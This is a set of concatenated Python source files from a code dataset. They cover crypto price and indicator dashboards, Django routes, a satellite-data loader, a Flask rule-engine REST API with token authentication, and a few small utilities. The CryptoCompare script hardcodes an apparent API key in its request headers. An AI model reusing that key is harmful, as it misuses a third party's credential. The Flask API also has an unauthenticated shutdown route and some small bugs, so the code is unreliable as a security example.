funçoes em uma classe\n# - fazer com que o environment load essa database\n# - copiar o step de algum bom trading env para o train_trading_bot.py\n# - ter uma flag para exibir esses indicadores\n\nsymbol_id_dict = {\n 'BTC': 1182,\n 'ETH': 7605,\n 'LTC': 3808,\n 'DASH': 3807,\n 'XMR': 5038,\n 'ETC': 5324,\n 'XRP': 5031\n }\n#------------------------------------------------------------->\nif not (os.path.exists('datasets/ETH-BTC.csv')):\n cprint('> downloading', 'yellow', attrs=['bold'])\n headers = {'User-Agent': 'Mozilla/5.0', 'authorization': 'Apikey 3d7d3e9e6006669ac00584978342451c95c3c78421268ff7aeef69995f9a09ce'}\n\n # OHLC\n url = 'https://min-api.cryptocompare.com/data/histohour?fsym=ETH&tsym=BTC&e=Binance&limit=2000'\n response = requests.get(url, headers=headers)\n json_response = response.json()\n result = json_response['Data']\n # df = pd.DataFrame(result)\n df1 = pd.DataFrame(result)\n\n # social\n url = 'https://min-api.cryptocompare.com/data/social/coin/histo/hour?coinId=7605&limit=2000'\n response = requests.get(url, headers=headers)\n json_response = response.json()\n result = json_response['Data']\n df2 = pd.DataFrame(result)\n\n # #merge\n df = pd.merge(df1, df2, on='time')\n df['Date'] = pd.to_datetime(df['time'], utc=True, unit='s')\n df.drop('time', axis=1, inplace=True)\n df.set_index('Date', inplace=True)\n\n # indicators\n # https://github.com/mrjbq7/ta-lib/blob/master/docs/func.md\n open_price, high, low, close = np.array(df['open']), np.array(df['high']), np.array(df['low']), np.array(df['close'])\n volume = np.array(df['volumefrom'])\n # cycle indicators\n df.loc[:, 'HT_DCPERIOD'] = talib.HT_DCPERIOD(close)\n df.loc[:, 'HT_DCPHASE'] = talib.HT_DCPHASE(close)\n df.loc[:, 'HT_PHASOR_inphase'], df.loc[:, 'HT_PHASOR_quadrature'] = talib.HT_PHASOR(close)\n df.loc[:, 'HT_SINE_sine'], df.loc[:, 'HT_SINE_leadsine'] = talib.HT_SINE(close)\n df.loc[:, 'HT_TRENDMODE'] = talib.HT_TRENDMODE(close)\n # momemtum indicators\n df.loc[:, 'ADX'] = talib.ADX(high, low, close, timeperiod=14)\n df.loc[:, 'ADXR'] = talib.ADXR(high, low, close, timeperiod=14)\n df.loc[:, 'APO'] = talib.APO(close, fastperiod=12, slowperiod=26, matype=0)\n df.loc[:, 'AROON_down'], df.loc[:, 'AROON_up'] = talib.AROON(high, low, timeperiod=14)\n df.loc[:, 'AROONOSC'] = talib.AROONOSC(high, low, timeperiod=14)\n df.loc[:, 'BOP'] = talib.BOP(open_price, high, low, close)\n df.loc[:, 'CCI'] = talib.CCI(high, low, close, timeperiod=14)\n df.loc[:, 'CMO'] = talib.CMO(close, timeperiod=14)\n df.loc[:, 'DX'] = talib.DX(high, low, close, timeperiod=14)\n df['MACD'], df['MACD_signal'], df['MACD_hist'] = talib.MACD(close, fastperiod=12, slowperiod=26, signalperiod=9)\n df.loc[:, 'MFI'] = talib.MFI(high, low, close, volume, timeperiod=14)\n df.loc[:, 'MINUS_DI'] = talib.MINUS_DI(high, low, close, timeperiod=14)\n df.loc[:, 'MINUS_DM'] = talib.MINUS_DM(high, low, timeperiod=14)\n df.loc[:, 'MOM'] = talib.MOM(close, timeperiod=10)\n df.loc[:, 'PPO'] = talib.PPO(close, fastperiod=12, slowperiod=26, matype=0)\n df.loc[:, 'ROC'] = talib.ROC(close, timeperiod=10)\n df.loc[:, 'RSI'] = talib.RSI(close, timeperiod=14)\n df.loc[:, 'STOCH_k'], df.loc[:, 'STOCH_d'] = talib.STOCH(high, low, close, fastk_period=5, slowk_period=3, slowk_matype=0, slowd_period=3, slowd_matype=0)\n df.loc[:, 'STOCHF_k'], df.loc[:, 'STOCHF_d'] = talib.STOCHF(high, low, close, fastk_period=5, fastd_period=3, fastd_matype=0)\n df.loc[:, 'STOCHRSI_K'], df.loc[:, 'STOCHRSI_D'] = talib.STOCHRSI(close, timeperiod=14, fastk_period=5, fastd_period=3, fastd_matype=0)\n df.loc[:, 'TRIX'] = talib.TRIX(close, timeperiod=30)\n df.loc[:, 'ULTOSC'] = talib.ULTOSC(high, low, close, timeperiod1=7, timeperiod2=14, timeperiod3=28)\n df.loc[:, 'WILLR'] = talib.WILLR(high, low, close, timeperiod=14)\n # overlap studies\n df.loc[:, 'BBANDS_upper'], df.loc[:, 'BBANDS_middle'], df.loc[:, 'BBANDS_lower'] = talib.BBANDS(close, timeperiod=5, nbdevup=2, nbdevdn=2, matype=0)\n df.loc[:, 'DEMA'] = talib.DEMA(close, timeperiod=30)\n df.loc[:, 'EMA'] = talib.EMA(close, timeperiod=30)\n df.loc[:, 'HT_TRENDLINE'] = talib.HT_TRENDLINE(close)\n df.loc[:, 'KAMA'] = talib.KAMA(close, timeperiod=30)\n df.loc[:, 'MA'] = talib.MA(close, timeperiod=30, matype=0)\n df.loc[:, 'MIDPOINT'] = talib.MIDPOINT(close, timeperiod=14)\n df.loc[:, 'WMA'] = talib.WMA(close, timeperiod=30)\n df.loc[:, 'SMA'] = talib.SMA(close)\n # pattern recoginition\n df.loc[:, 'CDL2CROWS'] = talib.CDL2CROWS(open_price, high, low, close)\n df.loc[:, 'CDL3BLACKCROWS'] = talib.CDL3BLACKCROWS(open_price, high, low, close)\n df.loc[:, 'CDL3INSIDE'] = talib.CDL3INSIDE(open_price, high, low, close)\n df.loc[:, 'CDL3LINESTRIKE'] = talib.CDL3LINESTRIKE(open_price, high, low, close)\n # price transform\n df.loc[:, 'WCLPRICE'] = talib.WCLPRICE(high, low, close)\n # statistic funcitons\n df.loc[:, 'BETA'] = talib.BETA(high, low, timeperiod=5)\n df.loc[:, 'CORREL'] = talib.CORREL(high, low, timeperiod=30)\n df.loc[:, 'STDDEV'] = talib.STDDEV(close, timeperiod=5, nbdev=1)\n df.loc[:, 'TSF'] = talib.TSF(close, timeperiod=14)\n df.loc[:, 'VAR'] = talib.VAR(close, timeperiod=5, nbdev=1)\n # volatility indicators\n df.loc[:, 'ATR'] = talib.ATR(high, low, close, timeperiod=14)\n df.loc[:, 'NATR'] = talib.NATR(high, low, close, timeperiod=14)\n df.loc[:, 'TRANGE'] = talib.TRANGE(high, low, close)\n # volume indicators\n df.loc[:, 'AD'] = talib.AD(high, low, close, volume)\n df.loc[:, 'ADOSC'] = talib.ADOSC(high, low, close, volume, fastperiod=3, slowperiod=10)\n df.loc[:, 'OBV'] = talib.OBV(close, volume)\n\n df.fillna(df.mean(), inplace=True)\n df.to_csv('datasets/ETH-BTC.csv')\n#------------------------------------------------------------->\nelse:\n cprint('> loading from cache')\n df = pd.read_csv('datasets/ETH-BTC.csv')\n#------------------------------------------------------------->\nquit()\nINCREASING_COLOR = 'rgb(41, 127, 255)'\nDECREASING_COLOR = 'rgb(255, 170, 0)'\n# plot 1 dashboard\ndata = [ dict(\n type = 'candlestick',\n open = df['open'],\n high = df['high'],\n low = df['low'],\n close = df['close'],\n x = df['Date'],\n yaxis = 'y2',\n name = 'Price',\n increasing = dict( line = dict( color = INCREASING_COLOR ) ),\n decreasing = dict( line = dict( color = DECREASING_COLOR ) ),\n) ]\n\nlayout=dict()\n\nfig = dict( data=data, layout=layout )\n\nfig['layout'] = dict()\nfig['layout']['title'] = 'Dashboard 1'\nfig['layout']['plot_bgcolor'] = '#2d2929'\nfig['layout']['paper_bgcolor'] = '#2d2929'\nfig['layout']['font'] = dict(color='rgb(255, 255, 255)', size=17)\nfig['layout']['xaxis'] = dict(rangeslider=dict(visible=False), rangeselector=dict(visible=True))\nfig['layout']['yaxis'] = dict(domain=[0, 0.2], showticklabels=False)\nfig['layout']['yaxis2'] = dict(domain=[0.2, 0.8])\nrangeselector = dict(\n visibe = True,\n x = 0, y = 0.9,\n bgcolor = 'rgba(150, 200, 250, 0.4)',\n font = dict( size = 13 ),\n buttons=list([\n dict(count=1,\n label='1 day',\n step='day',\n stepmode='backward'),\n dict(count=7,\n label='7 days',\n step='day',\n stepmode='backward'),\n dict(count=15,\n label='15 days',\n step='day',\n stepmode='backward'),\n dict(count=1,\n label='1 mo',\n step='month',\n stepmode='backward'),\n dict(step='all')\n ]))\nfig['layout']['xaxis']['rangeselector'] = rangeselector\nfig['data'].append( dict( x=df['Date'], y=df['SMA'], type='scatter', mode='lines',\n yaxis='y2', name='Moving Average' ) )\n\ncolors = []\nfor i in range(len(df['close'])):\n if i != 0:\n if df['close'][i] > df['close'][i-1]:\n colors.append(INCREASING_COLOR)\n else:\n colors.append(DECREASING_COLOR)\n else:\n colors.append(DECREASING_COLOR)\n\nfig['data'].append(dict(x=df['Date'], y=df['volumeto'],\n marker=dict( color=colors),\n type='bar', yaxis='y', name='Volume'))\n\noffline.plot(fig, filename='docs/dashboard_1.html', validate=False)\n\n# plot 2 dashboard\nDASH1 = ['analysis_page_views','charts_page_views','comments','fb_likes','fb_talking_about']\nfig = tools.make_subplots(rows=5, cols=1, subplot_titles=DASH1)\ntrace = go.Scatter(x=df['Date'], y=df['analysis_page_views'].pct_change(), name='analysis_page_views pct_change', fill='tonexty', mode='none')\nfig.append_trace(trace, 1, 1)\ntrace = go.Scatter(x=df['Date'], y=df['charts_page_views'].pct_change(), name='charts_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 2, 1)\ntrace = go.Bar(x=df['Date'], y=df['comments'].pct_change(), name='comments pct change')\nfig.append_trace(trace, 3, 1)\ntrace = go.Scatter(x=df['Date'], y=df['fb_likes'], name='fb_likes', fill='tonexty', mode='none')\nfig.append_trace(trace, 4, 1)\ntrace = go.Scatter(x=df['Date'], y=df['fb_talking_about'], name='fb_talking_about', fill='tonexty', mode='none')\nfig.append_trace(trace, 5, 1)\nfig['layout'].update(title='Dashboard 2',\n font=dict(color='rgb(255, 255, 255)', size=16),\n paper_bgcolor='#2d2929',\n plot_bgcolor='#2d2929')\noffline.plot(fig, filename='docs/dashboard_2.html')\n\n# plot 3 dashboard\nDASH2 = ['followers','forum_page_views', 'influence_page_views','markets_page_views','overview_page_views']\nfig = tools.make_subplots(rows=5, cols=1, subplot_titles=DASH2)\ntrace = go.Bar(x=df['Date'], y=df['followers'].pct_change(), name='followers pct change')\nfig.append_trace(trace, 1, 1)\ntrace = go.Scatter(x=df['Date'], y=df['forum_page_views'].pct_change(), name='forum_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 2, 1)\ntrace = go.Scatter(x=df['Date'], y=df['influence_page_views'].pct_change(), name='influence_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 3, 1)\ntrace = go.Scatter(x=df['Date'], y=df['markets_page_views'].pct_change(), name='markets_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 4, 1)\ntrace = go.Scatter(x=df['Date'], y=df['overview_page_views'].pct_change(), name='overview_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 5, 1)\nfig['layout'].update(title='Dashboard 3',\n font=dict(color='rgb(255, 255, 255)', size=16),\n paper_bgcolor='#2d2929',\n plot_bgcolor='#2d2929')\noffline.plot(fig, filename='docs/dashboard_3.html')","sub_path":"cryptocompare_api.py","file_name":"cryptocompare_api.py","file_ext":"py","file_size_in_byte":11194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"303948551","text":"\"\"\"planner URL Configuration\"\"\"\n\nfrom django.urls import path\nfrom django.urls import include\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import static, staticfiles_urlpatterns\nfrom django.views.generic.base import RedirectView\nfrom django.conf import settings\nfrom django.views.i18n import JavaScriptCatalog\nfrom planner import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('admin/jsi18n', JavaScriptCatalog.as_view(), name='javascript-catalog'),\n path('favicon.ico', RedirectView.as_view(url='/static/favicon.ico')),\n\n path('', views.Dashboard.as_view(), name='home_page'),\n\n path('deal/', views.DealList.as_view(), name='deal_list'),\n path('deal//change/', views.DealUpdate.as_view(), name='deal_update'),\n path('deal/add/', views.DealCreate.as_view(), name='deal_add'),\n path('deal//delete/', views.DealDelete.as_view(), name='deal_delete'),\n path('deal//calculation/', views.DealCalc.as_view(), name='calculation'),\n\n path('project/', views.TaskList.as_view(), name='task_list'),\n path('project//change/', views.TaskUpdate.as_view(), name='task_update'),\n path('project/add/', views.TaskCreate.as_view(), name='task_add'),\n path('project//delete/', views.TaskDelete.as_view(), name='task_delete'),\n path('project//', views.TaskDetail.as_view(), name='task_detail'),\n path('project/exchange/', views.TaskExchange.as_view(), name='task_exchange'),\n\n #path('sprint//week//', views.SprintList.as_view(), name='sprint_list'),\n path('sprint/', views.SprintList.as_view(), name='sprint_list'),\n\n path('execution//status//',\n views.ExecutionStatusChange.as_view(), name='execution_status_change'),\n\n path('receiver/', views.ReceiverList.as_view(), name='receiver_list'),\n path('receiver/add', views.ReceiverCreate.as_view(), name='receiver_add'),\n path('receiver//change/', views.ReceiverUpdate.as_view(), name='receiver_update'),\n path('receiver//delete/', views.ReceiverDelete.as_view(), name='receiver_delete'),\n\n path('project/types/', views.ProjectList.as_view(), name='project_type_list'),\n path('project/types/add/', views.ProjectCreate.as_view(), name='project_type_add'),\n path('project/types//change/', views.ProjectUpdate.as_view(), name='project_type_update'),\n path('project/types//delete/', views.ProjectDelete.as_view(), name='project_type_delete'),\n # path('project/registry/', views.TaskRegistry.as_view(), name='task_registry'),\n\n path('customer/', views.CustomerList.as_view(), name='customer_list'),\n path('customer/add', views.CustomerCreate.as_view(), name='customer_add'),\n path('customer//change/', views.CustomerUpdate.as_view(), name='customer_update'),\n path('customer//delete/', views.CustomerDelete.as_view(), name='customer_delete'),\n\n path('company/', views.CompanyList.as_view(), name='company_list'),\n path('company/add', views.CompanyCreate.as_view(), name='company_add'),\n path('company//change/', views.CompanyUpdate.as_view(), name='company_update'),\n path('company//delete/', views.CompanyDelete.as_view(), name='company_delete'),\n\n path('contractor/', views.ContractorList.as_view(), name='contractor_list'),\n path('contractor/add', views.ContractorCreate.as_view(), name='contractor_add'),\n path('contractor//change/', views.ContractorUpdate.as_view(), name='contractor_update'),\n path('contractor//delete/', views.ContractorDelete.as_view(), name='contractor_delete'),\n\n path('subtask//', views.SubtaskDetail.as_view(), name='subtask_detail'),\n path('inttask//', views.InttaskDetail.as_view(), name='inttask_detail'),\n path('login/', views.login_page, name='login_page'),\n path('logout/', views.logout_page, name='logout_page'),\n\n path('colleagues/', views.СolleaguesList.as_view(), name='colleagues_list'),\n path('colleagues//detail/', views.СolleaguesDetail.as_view(), name='colleagues_detail'),\n\n path('employee/', views.EmployeeList.as_view(), name='employee_list'),\n path('employee/add', views.EmployeeCreate.as_view(), name='employee_add'),\n path('employee//change/', views.EmployeeUpdate.as_view(), name='employee_update'),\n path('employee/change/', views.EmployeeSelfUpdate.as_view(), name='employee_self_update'),\n path('employee//bonus///',\n views.BonusesCalc.as_view(), name='bonus_calc'),\n\n path('news/', views.NewsList.as_view(), name='news_list'),\n path('news//detail/', views.NewsDetail.as_view(), name='news_detail'),\n path('news//change/', views.NewsUpdate.as_view(), name='news_update'),\n path('news/add/', views.NewsCreate.as_view(), name='news_add'),\n path('news//delete/', views.NewsDelete.as_view(), name='news_delete'),\n\n path('event/', views.EventList.as_view(), name='event_list'),\n path('event//detail/', views.EventDetail.as_view(), name='event_detail'),\n path('event//change/', views.EventUpdate.as_view(), name='event_update'),\n path('event/add/', views.EventCreate.as_view(), name='event_add'),\n path('event//delete/', views.EventDelete.as_view(), name='event_delete'),\n\n\n path('select2/', include('django_select2.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += staticfiles_urlpatterns()\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"planner/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"523102381","text":"import numpy as np\r\nfrom tqdm import tqdm\r\nfrom sen12ms_dataLoader import *\r\n\r\ndef load_data(args):\r\n # s1_trn=[]\r\n # s2_trn=[]\r\n # y_trn=[]\r\n # s1_val=[]\r\n # s2_val=[]\r\n # y_val=[]\r\n\r\n print('Loading data...')\r\n\r\n sen12ms = SEN12MSDataset(\"/data/PublicData/DF2020/trn/\")\r\n\r\n IDs = np.load('/data/PublicData/DF2020/trn/clean.npy')\r\n\r\n N = IDs.shape[0]\r\n\r\n # for i in tqdm([Seasons.SPRING,Seasons.SUMMER,Seasons.FALL,Seasons.WINTER]):\r\n #\r\n # s1_data, s2_data, y_data = sen12ms.get_triplets(i, s1_bands=S1Bands.ALL,\r\n # s2_bands=S2Bands.ALL, lc_bands=LCBands.ALL)\r\n\r\n\r\n #N=len(s1_data)\r\n\r\n #s1_data=IDs\r\n # s2_data=IDs\r\n # y_data=IDs\r\n\r\n #s1_data=np.array(s1_data)\r\n # s2_data=np.array(s2_data)\r\n # y_data=np.array(y_data)\r\n\r\n idx=np.arange(N)\r\n np.random.shuffle(idx)\r\n\r\n trn_ids=IDs[idx[:int(N * args.trn_ratio)],:]\r\n val_ids=IDs[idx[int(N * args.trn_ratio):int(N * (args.trn_ratio + args.val_ratio))],:]\r\n\r\n # s1_trn.extend(s1_data[idx[:int(N * args.trn_ratio)]])\r\n # s1_val.extend(s1_data[idx[int(N * args.trn_ratio):int(N * (args.trn_ratio + args.val_ratio))]])\r\n\r\n # s2_trn.extend(s2_data[idx[:int(N * args.trn_ratio)]])\r\n # s2_val.extend(s2_data[idx[int(N * args.trn_ratio):int(N * (args.trn_ratio + args.val_ratio))]])\r\n #\r\n # y_trn.extend(y_data[idx[:int(N * args.trn_ratio)]])\r\n # y_val.extend(y_data[idx[int(N * args.trn_ratio):int(N * (args.trn_ratio + args.val_ratio))]])\r\n\r\n #s1_trn=np.stack(s1_trn,axis=0)\r\n # s2_trn=np.stack(s2_trn,axis=0)\r\n # y_trn=np.stack(y_trn,axis=0)\r\n\r\n #s1_val=np.stack(s1_val,axis=0)\r\n # s2_val=np.stack(s2_val,axis=0)\r\n # y_val=np.stack(y_val,axis=0)\r\n\r\n s1_trn_name=[]\r\n s2_trn_name=[]\r\n y_trn_name=[]\r\n\r\n s1_val_name = []\r\n s2_val_name = []\r\n y_val_name = []\r\n\r\n season_dict={1:Seasons.SPRING,2:Seasons.SUMMER,3:Seasons.FALL,4:Seasons.WINTER}\r\n\r\n print('loading training files...')\r\n\r\n for i in tqdm(range(trn_ids.shape[0])):\r\n s1_name,s2_name,y_name=sen12ms.get_s1s2lc_triplet(season_dict[trn_ids[i,0]], trn_ids[i,1], trn_ids[i,2],\r\n s1_bands=S1Bands.ALL,s2_bands=S2Bands.ALL, lc_bands=LCBands.ALL)\r\n s1_trn_name.append(s1_name)\r\n s2_trn_name.append(s2_name)\r\n y_trn_name.append(y_name)\r\n\r\n print('loading valing files...')\r\n\r\n for i in tqdm(range(val_ids.shape[0])):\r\n s1_name,s2_name,y_name=sen12ms.get_s1s2lc_triplet(season_dict[val_ids[i,0]], val_ids[i,1], val_ids[i,2],\r\n s1_bands=S1Bands.ALL,s2_bands=S2Bands.ALL, lc_bands=LCBands.ALL)\r\n s1_val_name.append(s1_name)\r\n s2_val_name.append(s2_name)\r\n y_val_name.append(y_name)\r\n\r\n s1_trn_name = np.array(s1_trn_name)\r\n s2_trn_name = np.array(s2_trn_name)\r\n y_trn_name = np.array(y_trn_name)\r\n \r\n s1_val_name = np.array(s1_val_name)\r\n s2_val_name = np.array(s2_val_name)\r\n y_val_name = np.array(y_val_name)\r\n\r\n return s1_trn_name,s2_trn_name,y_trn_name,s1_val_name,s2_val_name,y_val_name\r\n","sub_path":"DataFusion2020_SEMISUPERVISED/preparedata.py","file_name":"preparedata.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"26575749","text":"# -*- coding: utf-8 -*-\nimport openpyxl\n# from random import Random\nfrom datetime import datetime, timedelta, date\nimport random\n\n\ndef RandomOpenid(colume, num):\n sheet = wb.active\n print('''\n请输入该服务号下openid的头部六位字符,例如:\noekZhuHq2sXvYXU7nafmp3uIJjvA,前六位为oekZhu;\n(可通过数据库或者开发获取一个)''')\n headers = input()\n\n for x in range(1, num + 1):\n str = ''\n chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz-_0123456789'\n length = len(chars) - 1\n for i in range(22):\n str += chars[random.randint(0, length)]\n sheet.cell(row=x, column=colume).value = headers + str\n\n\nwb = openpyxl.Workbook()\nwb.save(filename=\"text.xlsx\")\n\nSelectResults = ['random_open_id']\n\nfor x in range(0, len(SelectResults)):\n globals().get(SelectResults[x])(x + 1, 10)\n\nwb.save(\"text.xlsx\")\n","sub_path":"Excel/randomtest.py","file_name":"randomtest.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"597410743","text":"import flask\nimport flask_cors\nimport json\nimport logging\n\nMIMETYPE = \"application/json\"\n\napp = flask.Flask(__name__)\nflask_cors.CORS(app) # Allow all cross-origin requests\n_LOG = logging.getLogger(__name__)\n# _LOG.setLevel(logging.DEBUG)\n\nengine_obj = None # global reference to the OttoEngine object\n\n\ndef run_server():\n app.run(host='0.0.0.0')\n\n\ndef dict_to_json_response(data_dict: dict) -> flask.Response:\n return flask.Response(json.dumps(data_dict), mimetype=MIMETYPE)\n\n\n@app.route('/shutdown', methods=['GET'])\ndef shutdown():\n '''Signal the Werkzeug server to shutdown'''\n func = flask.request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n return \"\"\n\n\n@app.route('/rest/ping')\ndef ping():\n return dict_to_json_response({\"success\": True})\n\n\n@app.route('/rest/reload', methods=['GET'])\ndef reload():\n result = engine_obj.reload_rules_threadsafe()\n success = result.get(\"success\")\n if success:\n resp = {\"success\": success, \"message\": \"Rules reloaded successfully\"}\n else:\n resp = {\"success\": success, \"message\": result.get(\"message\")}\n return dict_to_json_response(resp)\n\n\n@app.route('/rest/rules', methods=['GET'])\ndef rules():\n rules = engine_obj.get_rules_threadsafe()\n resp = {\"data\": [rule.serialize() for rule in rules]}\n return dict_to_json_response(resp)\n\n\n@app.route('/rest/entities', methods=['GET'])\ndef entities():\n entities = engine_obj.get_entities_threadsafe()\n resp = json.dumps({\n \"data\": [\n {\n \"entity_id\": entity.get(\"entity_id\"),\n \"friendly_name\": entity.get(\"friendly_name\"),\n \"hidden\": entity.get(\"hidden\"),\n }\n for entity in entities\n ]\n })\n return resp\n\n\n@app.route('/rest/services', methods=['GET'])\ndef services():\n services = engine_obj.get_services_threadsafe()\n resp = json.dumps({\n \"data\": [service.serialize() for service in services]\n })\n return resp\n\n\n@app.route('/rest/rule', methods=['PUT'])\n@app.route('/rest/rule/', methods=['GET', 'PUT', 'DELETE'])\ndef rule(rule_id=None):\n\n if flask.request.method == 'GET':\n \"\"\"Return the rule with ID \"\"\"\n _LOG.info(\"GET for rule {}\".format(rule_id))\n rule = engine_obj.get_rule_threadsafe(rule_id)\n if rule is None:\n resp = json.dumps({\n \"success\": False,\n \"id\": rule_id,\n \"message:\": \"Rule was not found\"\n })\n else:\n resp = json.dumps({\n \"success\": True,\n \"id\": rule_id,\n \"data\": rule.serialize()\n })\n return resp\n\n if flask.request.method == 'PUT':\n \"\"\"Store the rule as ID \"\"\"\n _LOG.info(\"PUT for rule {}\".format(rule_id))\n _LOG.debug(flask.request.data)\n\n data = flask.request.get_json().get(\"data\")\n\n result = engine_obj.save_rule_threadsafe(data)\n\n success = result.get(\"success\")\n if success:\n resp = json.dumps({\n \"success\": success,\n \"id\": data.get(\"id\"),\n \"message\": \"Rule saved\"\n })\n else:\n resp = json.dumps({\n \"success\": success,\n \"id\": rule_id,\n \"message\": result.get(\"message\"),\n \"data\": data\n })\n return resp\n\n if flask.request.method == 'DELETE':\n \"\"\"Delete rule with ID \"\"\"\n _LOG.info(\"DELETE for rule {}\".format(rule_id))\n success = engine_obj.delete_rule_threadsafe(rule_id)\n return json.dumps({\n \"success\": success,\n \"id\": rule_id\n })\n\n else:\n # POST Error 405 Method Not Allowed\n _LOG.error(\"ERROR: {}\".format(flask.request.print))\n\n return resp\n\n\n@app.route('/rest/clock/check', methods=['PUT'])\ndef clock_check():\n spec = flask.request.get_json().get('data')\n _LOG.info(spec)\n result = engine_obj.check_timespec_threadsafe(spec)\n\n success = result.get(\"success\")\n if success:\n resp = json.dumps({\n \"success\": success,\n \"data\": {\"next_time\": result.get(\"next_time\")}\n })\n else:\n resp = json.dumps({\n \"success\": success,\n \"message\": result.get(\"message\"),\n \"data\": {\"spec\": spec}\n })\n return resp\n\n\n@app.route('/rest/logs', methods=['GET'])\ndef logs():\n resp = json.dumps({\n \"data\": [entry for entry in engine_obj.get_logs_threadsafe()]\n })\n return resp\n","sub_path":"ottoengine/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"530021580","text":"# -*- coding:utf-8 -*-\n# 迭代\n# 只要作用于一个可迭代对象,for循环就可以正常运行\n# 字符串也是可迭代对象\n# 整数不可迭代\n# dict迭代的是key。如果要迭代value,可以用for value in d.values(),如果要同时迭代key和value,可以用for k, v in d.items()\n# 通过collections模块的Iterable类型判断是否可迭代\n# 弃用警告了,改为从collections.abc里import\n# from collections.abc import Iterable\n# print(isinstance(123, Iterable))\n# Python内置的enumerate()函数可以把一个list变成索引-元素对\n# 下面输出0 a形式\n# for i, value in enumerate(['a', 'b', 'c']):\n# print(i, value)\n# print(enumerate(['a', 'b', 'c']))\n# \n# for x, y in [(1, 1), (2, 4), (3, 9)]:\n# print(x, y)\n\n\ndef findMinAndMax(l):\n # 利用迭代找到数列l里的最小最大,用tuple返回\n if len(l) == 0:\n return None, None\n else:\n mi, ma = l[0], l[0]\n for i in l:\n if i < mi:\n mi = i\n if i > ma:\n ma = i\n return mi, ma\n\n\nif findMinAndMax([]) != (None, None):\n print('测试失败!')\nelif findMinAndMax([7]) != (7, 7):\n print('测试失败!')\nelif findMinAndMax([7, 1]) != (1, 7):\n print('测试失败!')\nelif findMinAndMax([7, 1, 3, 9, 5]) != (1, 9):\n print('测试失败!')\nelse:\n print('测试成功!')\n","sub_path":"python/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"450859698","text":"import base64\nfrom functools import wraps\n\nfrom flask import current_app, request, abort\nfrom itsdangerous import (TimedJSONWebSignatureSerializer\n as Serializer)\n\nfrom app_folder import login, db\nfrom app_folder.models import User\n\n\n@login.request_loader\ndef load_user_from_request(request):\n\n # first, try to login using the api_key url arg\n api_key = request.headers.get('Api-Key')\n if api_key:\n user = User.verify_auth_token(api_key)\n if user:\n return user\n\n # next, try to login using Basic Auth\n api_key = request.headers.get('Authorization')\n\n if api_key:\n if isinstance(api_key, bytes):\n api_key = api_key.replace(b'Basic ', b'', 1)\n elif isinstance(api_key, str):\n api_key = api_key.replace('Basic ', '', 1)\n try:\n api_key = base64.b64decode(api_key).decode()\n api_username = api_key.split(\":\")[0]\n api_password = api_key.split(\":\")[1]\n except TypeError:\n pass\n user = User.query.filter_by(username=api_username).first()\n if user:\n if user.check_password(api_password):\n return user\n else:\n return None\n\n # finally, return None if both methods did not login the user\n else:\n return None\n return None\n\n\ndef update_user_token(user):\n current_session = user.current_session_user\n new_session = current_session + 1\n # Increment session number\n user.current_session_user = new_session\n user_id_ = user.id\n auth_token = generate_auth_token(user_id_, new_session)\n user.api_key = auth_token\n db.session.add(user)\n db.session.commit()\n return user.api_key\n\n\ndef generate_auth_token(user_id, session_number, expiration=432000):\n s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration)\n return s.dumps({'id': user_id, 'session': session_number})\n\n\ndef requires_key(func):\n @wraps(func)\n def wrapped(*args, **kwargs):\n api_key = request.headers.get('Api-Key', False)\n if api_key is False:\n abort(400)\n if User.verify_auth_token(api_key) is False:\n abort(401)\n elif User.verify_auth_token(api_key) is None:\n abort(401)\n else:\n return func(*args, **kwargs)\n return func(*args, **kwargs)\n return wrapped","sub_path":"mysite/app_folder/api/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"27491711","text":"\"\"\"empty message\n\nRevision ID: e3a07512b73f\nRevises: 105b6435def0\nCreate Date: 2019-05-16 23:02:48.181417\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e3a07512b73f'\ndown_revision = '105b6435def0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('workshops', sa.Column('date', sa.String(length=10), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('workshops', 'date')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e3a07512b73f_.py","file_name":"e3a07512b73f_.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"404392837","text":"\"\"\"The game Snake.\"\"\"\n\nimport ConfigParser\nimport dallinger as dlgr\n\n\nclass ConcentrationGame(dlgr.experiments.Experiment):\n \"\"\"Define the structure of the experiment.\"\"\"\n\n def __init__(self, session):\n \"\"\"Initialize the experiment.\"\"\"\n config = ConfigParser.ConfigParser()\n 